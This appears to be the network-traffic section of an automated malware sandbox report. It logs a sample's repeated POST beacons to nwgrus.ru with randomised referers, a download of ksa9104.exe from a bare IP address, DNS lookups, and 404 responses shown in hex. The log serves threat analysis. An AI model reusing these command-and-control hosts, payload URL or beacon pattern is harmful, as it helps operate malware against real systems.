                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fboiokwqifnpfwwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjlnjwyjoxyuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jvksadufkdlihaeq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ricjpvrheenoi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uobogpxbvskdl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwmsjsqvwuhba.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kskrxgkqoed.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euceyfvfmeh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qptrydkvolka.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kaqmpmaijfnk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gyvqqphlebcxdpkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljhchdbaaaxer.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjsnmktycknrotm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtnnfkxyrnmdua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjxqibcjarykr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwriihoulvmts.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfjjiuyrybf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtbardaliciv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xijgwgdevjmtswh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:42 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:57 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:29:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:15 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:32 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:49 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
